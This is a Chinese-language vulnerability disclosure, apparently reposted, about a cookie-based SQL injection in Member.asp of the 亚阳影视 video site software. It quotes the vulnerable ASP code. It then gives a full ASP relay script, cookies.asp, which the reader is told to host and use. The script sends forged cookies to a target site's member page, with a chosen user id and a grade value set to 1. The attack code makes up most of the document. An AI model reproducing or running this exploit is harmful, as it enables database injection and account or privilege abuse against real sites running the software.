亚阳影视全版本注入漏洞0806[member.asp] -电脑资料

    BY:Xiao.K@secdst.net

    文章出自：http://blog.sadk.org

    涉及版本： 全版本

    漏洞文件：

    Member.asp

    漏洞描述：

    ################################################################

    if Rq(”action”)=”exit” then

    set rs=server.createobject(”adodb.recordset”)

    sql=”select * from 会员 where 用户名=’”&Request.cookies(”username”)&”‘”

    rs.open sql,conn,1,3

    if not rs.EOF then

    call write_userlog(Request.cookies(”username”),”日志”,”退出登陆”,”0″,”0″)

    rs(”在线状态”)=”否”

    rs.update

    Response.cookies(”userid”)=”"

    Response.cookies(”username”)=”"

    Response.cookies(”grade”)=”"

    end if

    Response.redirect request.servervariables(”HTTP_REFERER”)

    end if

    ################################################################

    Username未过滤导致cookies注入

    把以下代码保存为cookies.asp，并且上传到支持asp的空间，

亚阳影视全版本注入漏洞0806[member.asp]

    ################################################################

    Usage:

    http://blog.sadk.org/temp/03/jmc ... 5&user=bnzm5270

    ###########################################################

    <%

    username=request("user") 'username

    id=request("id") 'userid

    url=request("url") 'url

    username=escape(username)

    id=escape(id)

    JMUrl="http://"&url&"/member/src_1.asp"

    JmRef="http://"&url&"/member/src_1.asp"

    jmcok="grade=1;userid=" & id &";username="&username&";"

    JmCok=JmCok

    JmCok=URLEncoding(JmCok)

    JmStr=""

    response.write PostData(JMUrl,JmStr,JmCok,JmRef)

    Function PostData(PostUrl,PostStr,PostCok,PostRef)

    Dim Http

    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")

    With Http

    .Open "POST",PostUrl,False

    .SetRequestHeader "Content-Length",Len(PostStr)

    .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"

    .SetRequestHeader "Referer",PostRef

    .SetRequestHeader "Cookie",PostCok

    .Send PostStr

    PostData = .ResponseBody

    End With

    Set Http = Nothing

    PostData =bytes2BSTR(PostData)

    End Function

    Function bytes2BSTR(vIn)

    Dim strReturn

    Dim I, ThisCharCode, NextCharCode

    strReturn = ""

    For I = 1 To LenB(vIn)

    ThisCharCode = AscB(MidB(vIn, I, 1))

    If ThisCharCode < &H80 Then

    strReturn = strReturn & Chr(ThisCharCode)

    Else

    NextCharCode = AscB(MidB(vIn, I + 1, 1))

    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

    I = I + 1

    End If

    Next

    bytes2BSTR = strReturn

    End Function

    Function URLEncoding(vstrin)

    strReturn=""

    Dim i

    For i=1 To Len(vstrin)

    ThisChr=Mid(vstrin,i,1)

    if Abs(Asc(ThisChr))< &HFF Then

    strReturn=strReturn & ThisChr

    Else

    InnerCode=Asc(ThisChr)

    If InnerCode<0 Then

    InnerCode=InnerCode + &H10000

    End If

    Hight1=(InnerCode And &HFF00) \&HFF

    Low1=InnerCode And &HFF

    strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)

    End if

    Next

    URLEncoding=strReturn

    End Function

    % >

    #################################################################